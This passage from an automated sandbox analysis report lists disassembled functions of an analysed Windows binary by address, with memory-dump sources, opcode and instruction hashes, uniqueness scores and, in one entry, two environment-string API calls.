                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9011a3145cd874ac2aa3139c3451b8eb41777b98e3ebe3c3bf4d1c0a8df8dc93
                                                  • Instruction ID: 59474c69be69e821d97944b7ab22acf0d8b2d0ae7cd1e26f709f02444cf6c51e
                                                  • Opcode Fuzzy Hash: 9011a3145cd874ac2aa3139c3451b8eb41777b98e3ebe3c3bf4d1c0a8df8dc93
                                                  • Instruction Fuzzy Hash: E721AC356041134BDB1DEAACA4928F63793AFE631075EA27D9091CB6C4DF38890BD741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B3A816 Relevance: .1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 32c366eb3e238cfc16f6f729cda65ec0ac79cdc48696427769394c023f6b5ffa
                                                  • Instruction ID: 8e5869f87746c77ddf4e34cad79bab45a160665f0cf256b17182feac176465a6
                                                  • Opcode Fuzzy Hash: 32c366eb3e238cfc16f6f729cda65ec0ac79cdc48696427769394c023f6b5ffa
                                                  • Instruction Fuzzy Hash: 8F3158712087238BC708EB38D4504BBB3D6FFC9324BA1873EE5A2971D4DB70940ACA81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00CD343F Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6db294127bb8abbc78369f3eba298297fd2fd13b4b753432241fc73ca86a34e0
                                                  • Instruction ID: 6d9fc5952899b83d46500bf5aa02b74764b289a696ce4c72b2c63b97890f987c
                                                  • Opcode Fuzzy Hash: 6db294127bb8abbc78369f3eba298297fd2fd13b4b753432241fc73ca86a34e0
                                                  • Instruction Fuzzy Hash: 6631CD79508B238B8328FF34A8814EBB3E2EBC1721F448B3DC5A5875C5D3B5501AC691
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00CA349A Relevance: .1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f585a663213e385eab31175ccafe3bd52a1061d64f3f323a9688fe70ea808147
                                                  • Instruction ID: 6f67f0d7f56d837d696ff527c37e4f1e16b098f0638a15029d4fadd7f6a3c244
                                                  • Opcode Fuzzy Hash: f585a663213e385eab31175ccafe3bd52a1061d64f3f323a9688fe70ea808147
                                                  • Instruction Fuzzy Hash: E631EC3201061687C328EB7CD4104EA73D2AFD1318B60873DE4A5C74E4FBB9416BD704
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00CF1FE5 Relevance: .1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9fdcf0c0754fc44de422231516875cb6111ee61391aee3280a66d6886b85a2ca
                                                  • Instruction ID: 26d520e4b099cd3c263d44ddefd64f2a23cec7de224417550351b505f4983395
                                                  • Opcode Fuzzy Hash: 9fdcf0c0754fc44de422231516875cb6111ee61391aee3280a66d6886b85a2ca
                                                  • Instruction Fuzzy Hash: EC215732A186128BCB18EF7DC810997B7D3EFC5320F19C67DA196CB6C9EB7594069B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00DB8000 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2feb4e659034bda08a853618d4588f1b3dc6a4492074a89ff0278fb75990d1b4
                                                  • Instruction ID: 8d420411fc89137ed0989b9be7d364f3c0e4505b774796dd2d436b595b1ab872
                                                  • Opcode Fuzzy Hash: 2feb4e659034bda08a853618d4588f1b3dc6a4492074a89ff0278fb75990d1b4
                                                  • Instruction Fuzzy Hash: 6031F331118B01CBE318DB2895916A7B7E2FBD2328F64CB7DD5AA875D0C335A01ECB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D813C5 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4519b89e156f43faeb973a9870656e0e29698edb52dc4a5d52e24c97bf5e6c98
                                                  • Instruction ID: a9cdf975b7b7736f2579b9924a6ce21ae43b016efb46a2a2b4d174d3c3c1f6d5
                                                  • Opcode Fuzzy Hash: 4519b89e156f43faeb973a9870656e0e29698edb52dc4a5d52e24c97bf5e6c98
                                                  • Instruction Fuzzy Hash: FC3127344187928FD708EB3CE4514EBB7A2EBC6360F614A6D91A68B1E5C735512EDF01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C009DE Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c14e796c92b540f83b2722616a6d2ece8734a6fed3935a88cc40cc0186bb62d
                                                  • Instruction ID: 3241c5a14297dea7055657517ac136c4dda15e4934b49739f9c4bd72c90c9117
                                                  • Opcode Fuzzy Hash: 6c14e796c92b540f83b2722616a6d2ece8734a6fed3935a88cc40cc0186bb62d
                                                  • Instruction Fuzzy Hash: E32104346087064FC725EF39D8544EEB3D6EBC9320F509A3DA996C3195EB345229CA91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00DDA361 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4872869f29e3c747a2176d1b27d13c27b6ac6d4a4e95c858e5dff53691ab506
                                                  • Instruction ID: d5a8bac1dd0d1bbcdc919287a99d30600ac6559509a5966d5cc415a7a8916776
                                                  • Opcode Fuzzy Hash: c4872869f29e3c747a2176d1b27d13c27b6ac6d4a4e95c858e5dff53691ab506
                                                  • Instruction Fuzzy Hash: 9811262361CB5207E328EA39885517B66C2EF92331F58C73CE5EAC36D5D738C4018655
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D14868 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b489378157b4479970aa052444b27d85359239d023f43ce5b5aaab9232aa174f
                                                  • Instruction ID: ff066492366c6374c23ff362136947dae6d401a1ae6e6b7ad71aeed8562ebc6e
                                                  • Opcode Fuzzy Hash: b489378157b4479970aa052444b27d85359239d023f43ce5b5aaab9232aa174f
                                                  • Instruction Fuzzy Hash: CD11F0366187668BD728EB79E8124A6B3E2DFDA360F60D26CD8B6831D0D7380006CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B1FCC0 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                  • Instruction ID: f876764d4b1f9c16687d4a95fc5eb691fdbe250a5d091d81c33df285d08cf6a6
                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                  • Instruction Fuzzy Hash: 0B11E933B051D64EC3168D3C94405B5BFE34A93234BA943F9F4B99B2D2D6228DCAC364
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B261F7 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b700bee2bdf15ecac32f4fa3b5ef60f9477504d13b1dc315c70153c228b1eeea
                                                  • Instruction ID: 818fdbe62cc9e5252b4606f201a2783e8dfbfa07e6422ddf8e031ae8bb874e60
                                                  • Opcode Fuzzy Hash: b700bee2bdf15ecac32f4fa3b5ef60f9477504d13b1dc315c70153c228b1eeea
                                                  • Instruction Fuzzy Hash: 91F0BEA2855132C6D7286B40E8B233373F1FF02354B282488D08B9B760FB645860D36A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B281B9 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e413ad74ce20ef53d05f16672cdce9f0c591f8c498c83e1a562f837431c9989
                                                  • Instruction ID: 19c7a69b1fe5882752746c7578026df8a52e7cc7356ad8a6f31a019c52da47cd
                                                  • Opcode Fuzzy Hash: 8e413ad74ce20ef53d05f16672cdce9f0c591f8c498c83e1a562f837431c9989
                                                  • Instruction Fuzzy Hash: 57F05E31A1A3119BC748CF19D59123EFBE1AF86741F1858ADE4C9D7290DE30D8558B42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B2617A Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 585d2456378dfc00a772d3fa1809ae6802b0aa48dec97316aaf4e2b8aaeace61
                                                  • Instruction ID: a5ce01efe3704ad5d287a3e7fef5d61ed7dcdbedf3739f36e951d09e2b53bbeb
                                                  • Opcode Fuzzy Hash: 585d2456378dfc00a772d3fa1809ae6802b0aa48dec97316aaf4e2b8aaeace61
                                                  • Instruction Fuzzy Hash: DFE0863854425387CB14CF14E821676B3F1FF42345F24384EE486A7250EB34F812C749
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B12090 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 36d9e04744423521ca1533c873dd47eae6c485346fa169ae17ca9136ade66746
                                                  • Instruction ID: 53e2b964d4ebe5833635eca0c252d9a1bd14d2f70e20ccfb25f983fc9e2e7f3a
                                                  • Opcode Fuzzy Hash: 36d9e04744423521ca1533c873dd47eae6c485346fa169ae17ca9136ade66746
                                                  • Instruction Fuzzy Hash: A6E04F586245824B971DCF2998B42B6B3E79B9B3057A8C299D48347251DA21D8A2CA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFD2A0 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                  • Instruction ID: 9ce3283ead1563e5622e542a72b497f949eaf673030477764a6fd09ea7f1f831
                                                  • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                  • Instruction Fuzzy Hash: D2D0A7715487A50E975A8F7804A04B7FBE9E947622B18149EF5D1E7105D220DC0156D8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B27499 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8dc4a9cd69703f777a56d9b8c70fa4a9722be479fa3026e474c307839879fa75
                                                  • Instruction ID: 8616bc850e3d61d0026780b12df9bdaffac22d2d91cc4dcba92eac683dc373fe
                                                  • Opcode Fuzzy Hash: 8dc4a9cd69703f777a56d9b8c70fa4a9722be479fa3026e474c307839879fa75
                                                  • Instruction Fuzzy Hash: 2FB01234AFC90087C658CF04ED51437F33AA707704B643818D41BE73A1CD10E610895C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B12A7C Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 355COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00B12C13
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00B12C4C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings
                                                  • String ID: _M$_Z
                                                  • API String ID: 237503144-3854244849
                                                  • Opcode ID: af60141da69783854f3cfe8659527619946e3126e8644b47fe7e4cb84ef522f3
                                                  • Instruction ID: 2df081f8d7ec9ac439af6ef3c21e3d9fe862662d8e5458688706136c91d3ec84
                                                  • Opcode Fuzzy Hash: af60141da69783854f3cfe8659527619946e3126e8644b47fe7e4cb84ef522f3
                                                  • Instruction Fuzzy Hash: 1FF112B5600B018FD724CF28C491B57BBF2BF89314F158A5DD8AA8BB85D734E846CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%